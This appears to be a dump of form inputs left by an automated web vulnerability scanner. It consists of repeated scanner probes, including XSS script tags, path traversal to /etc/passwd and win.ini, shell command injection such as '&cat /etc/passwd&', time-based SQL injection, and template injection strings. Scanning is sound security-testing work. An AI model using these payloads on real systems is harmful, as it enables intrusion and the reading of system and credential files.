\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(953455)</ScRiPt>

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(977984)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(953116)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971812></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(990295)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(962921)">

1

1

WEB-INF/web.xml

1

1

response.write(9572296*9598400)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983521)"></g></svg>

WEB-INF\web.xml

1

1

1

1

'+response.write(9572296*9598400)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<div style=width:expression(prompt(958877))>

../../../../../../../../../../etc/passwd

1

"+response.write(9572296*9598400)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<body onload=prompt(918586)>

1

"&cat /etc/passwd&"

1

1

${99982+99061}

../../../../../../../../../../etc/passwd.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932879)>

1

cat /etc/passwd

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(956932)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

1

1&n999672=v997892

-1))

1<img/src=">" onerror=alert(963391)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

)

1

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(937762)</sCripT>

FlbL2suP'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

m8odiv65')

'"()

1&lt

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

GNqMjvx1'))

1

'

"|"ld

\xf6<img acu onmouseover=prompt(988715) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

1

1

-1

"

1<input autofocus onfocus=prompt(949038)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

'

http://hitiPBhsZT4nZ.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

oRqQFiRi'

1

||cat /etc/passwd

1_TSIu9 <ScRiPt >prompt(939849)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

6iIcn9bl')

comments

1

'"

file:///etc/passwd

&dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(921446)</ScRiPt>

dUyywl2l'))

comments/.

<!--

'&dir&'

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(921159)</ScRiPt>

TERUPXji'))

1

1

"&dir&"

1

1_953422

1

WEB-INF\web.xml

1

1

1

1

|dir

acu9557\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9557

../../../../../../../../../../windows/win.ini

1

1

1

1

'|dir

../../../../../../../../../../boot.ini

acux5357\xc0\xbez1\xc0\xbcz2a\x90bcxuca5357

1

1

"|dir

1

1<ScRiPt >prompt(968896)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(936093)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(918226)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911842></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(924825)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(977852)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986712)"></g></svg>

1

1

1

1<div style=width:expression(prompt(922355))>

response.write(9266957*9002796)

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

1

'+response.write(9266957*9002796)+'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(935016)>

&cat /etc/passwd&

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"+response.write(9266957*9002796)+"

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959072)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(914916)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(933444)>

1

cat /etc/passwd

${100347+100073}

1

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(948269)</sCripT>

1

`cat /etc/passwd`

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1&n913448=v935488

1&lt

1

1

1

yiq13qzf'

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1

\xf6<img acu onmouseover=prompt(965042) //\xf6>

1

1

njqrLbAd')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

!(()&&!|*|*|

"|"ld

1<input autofocus onfocus=prompt(995612)>

1

1

h2Yg6Wor'))

testasp.vulnweb.com

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

"

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_cd640 <ScRiPt >prompt(935403)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

"

1

1

-1))

1

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://hitOW9IRGXZVj.bxss.me/

1

kle4ctsH'

1

comments

1

1

&dir

1

1

H4dri37L')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

file:///etc/passwd

'&dir&'

1

http://www.acunetix.tst

zU4yB3HJ'))

1

1

'"

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(956935)</ScRiPt>

1

1

1

<!--

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(959799)</ScRiPt>

1

1

1

1

1

1

1

WEB-INF\web.xml

'|dir

1_953844

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu1157\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1157

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux8583\xc0\xbez1\xc0\xbcz2a\x90bcxuca8583

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(980453)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<script>prompt(937101)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(981563)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986611></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(969211)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9124442*9470198)

1

1

1<video><source onerror="javascript:prompt(923439)">

1

1

WEB-INF/web.xml

'+response.write(9124442*9470198)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(956265)"></g></svg>

"+response.write(9124442*9470198)+"

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1<div style=width:expression(prompt(976827))>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(938086)>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(923529)>

${100019+99243}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1

1

1<img src=xyz OnErRor=prompt(930845)>

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n920733=v992140

-1))

1

1<img/src=">" onerror=alert(900642)>

)

PWyuCv4L'

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<ScRiPt%20>prompt(980678)</sCripT>

!(()&&!|*|*|

cs3UbMfB')

'"()

"|"ld

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

^(#$!@#$)(()))******

1

nC2QLMwi'))

1

1

1

/etc/passwd

'

1

\xf6<img acu onmouseover=prompt(915752) //\xf6>

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1<input autofocus onfocus=prompt(946613)>

1

-1)

1

"

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

-1))

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

http://hitsz1nNxUBFX.bxss.me/

QYANWB8j'

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

comments

1

&dir

1

R2fr6xsV')

1

1

1_EhnWj <ScRiPt >prompt(951687)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

file:///etc/passwd

http://www.acunetix.tst

IbxxtALt'))

'"

1

1

1

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

<!--

1

1

1'"()&%<ScRiPt >prompt(995352)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1

1

1

1

'"()&%<ScRiPt >prompt(969285)</ScRiPt>

WEB-INF\web.xml

'|dir

1

1

1

1

"|dir

1_979989

../../../../../../../../../../windows/win.ini

1

1

1

acu9559\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9559

1

../../../../../../../../../../boot.ini

1

1

acux7497\xc0\xbez1\xc0\xbcz2a\x90bcxuca7497

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(974984)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(939917)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(927242)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989840></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(959062)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(989535)">

1

1

WEB-INF/web.xml

response.write(9369777*9101843)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911405)"></g></svg>

WEB-INF\web.xml

&cat /etc/passwd&

1

'+response.write(9369777*9101843)+'

1

1

1<div style=width:expression(prompt(920029))>

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"+response.write(9369777*9101843)+"

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(903144)>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

-1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983889)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

-1)

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(943007)>

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

-1))

1

${100089+99411}

1

1

1<img/src=">" onerror=alert(918541)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

8C1IK3jd'

'|'ld

1

1

1

1<ScRiPt%20>prompt(916473)</sCripT>

1&n974153=v977800

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

ckiSnDwO')

"|"ld

1

)

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

554hqa4D'))

1

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(939300) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

'

1

'"()

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(912568)>

'

1

1

/etc/passwd

1

-1)

"

1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

||cat /etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitEEmcULhZWo.bxss.me/

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

5RbwbewP'

1

1

1

comments

1_wBkRt <ScRiPt >prompt(936001)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

z6P7jZsP')

1

1

1

1

comments

"&dir&"

71CoRSLR'))

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

|dir

1

1

comments/.

1

1

1

1

'"

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

1'"()&%<ScRiPt >prompt(984042)</ScRiPt>

<!--

1

1

WEB-INF/web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(986745)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

1_947075

1

1

../../../../../../../../../../windows/win.ini

acu7333\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7333

1

1

1

1

../../../../../../../../../../boot.ini

acux4160\xc0\xbez1\xc0\xbcz2a\x90bcxuca4160

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(942797)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(904051)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(913009)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915686></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(966976)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(956772)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9493220*9132383)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(917935)"></g></svg>

1

1

'+response.write(9493220*9132383)+'

1

&cat /etc/passwd&

1<div style=width:expression(prompt(979663))>

1

1

"+response.write(9493220*9132383)+"

WEB-INF/web.xml

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(990787)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946020)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1<img src=xyz OnErRor=prompt(905295)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

${100258+99134}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1<img/src=">" onerror=alert(921741)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1&n963905=v928507

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1<ScRiPt%20>prompt(963494)</sCripT>

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

Zz2BCbTR'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

7VFoRvu3')

\xf6<img acu onmouseover=prompt(989249) //\xf6>

'

^(#$!@#$)(()))******

testasp.vulnweb.com

/etc/passwd

1

1

1

1<input autofocus onfocus=prompt(930108)>

lZzbV8rd'))

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

-1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

http://hitqsDvRbdbbQ.bxss.me/

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

comments

1

1

-1))

1_AXbLV <ScRiPt >prompt(959057)</ScRiPt>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

comments

1

1

yfGqcomH'

1

http://www.acunetix.tst

file:///etc/passwd

1

1

1

'&dir&'

comments/.

diIdI38k')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"

1'"()&%<ScRiPt >prompt(974077)</ScRiPt>

1

"&dir&"

fOaLBK2a'))

WEB-INF/web.xml

1

1

1

<!--

'"()&%<ScRiPt >prompt(921181)</ScRiPt>

|dir

1

WEB-INF\web.xml

1

1

1

1

1_991108

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

"|dir

acu10543\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10543

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9465\xc0\xbez1\xc0\xbcz2a\x90bcxuca9465

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(957126)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<script>prompt(925233)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(947537)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978810></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(975598)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(942939)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925209)"></g></svg>

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(921200))>

response.write(9170095*9863712)

1

1

WEB-INF\web.xml

'+response.write(9170095*9863712)+'

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9170095*9863712)+"

'&cat /etc/passwd&'

1<body onload=prompt(971699)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968585)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(906446)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

-1

1

1

1<img/src=">" onerror=alert(930594)>

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

${100344+100327}

-1)

1

1

1<ScRiPt%20>prompt(964233)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1&n951578=v959150

-1))

1

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

JlBmQJaP'

)

1

1

\xf6<img acu onmouseover=prompt(922600) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GFs7MLUp')

!(()&&!|*|*|

1<input autofocus onfocus=prompt(960522)>

1

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

pp5txk6h'))

^(#$!@#$)(()))******

1

'

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

"

1

1

1

1

"

1_EpaL5 <ScRiPt >prompt(953873)</ScRiPt>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hitszhO6iv2Yz.bxss.me/

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

h2HKDcxm'

1

1

&dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

wzD7UUO5')

http://www.acunetix.tst

'&dir&'

comments

1

file:///etc/passwd

1

1

1

"&dir&"

'"

MpxRagvE'))

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(953891)</ScRiPt>

|dir

<!--

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(981325)</ScRiPt>

1

'|dir

1

1

1

1

WEB-INF\web.xml

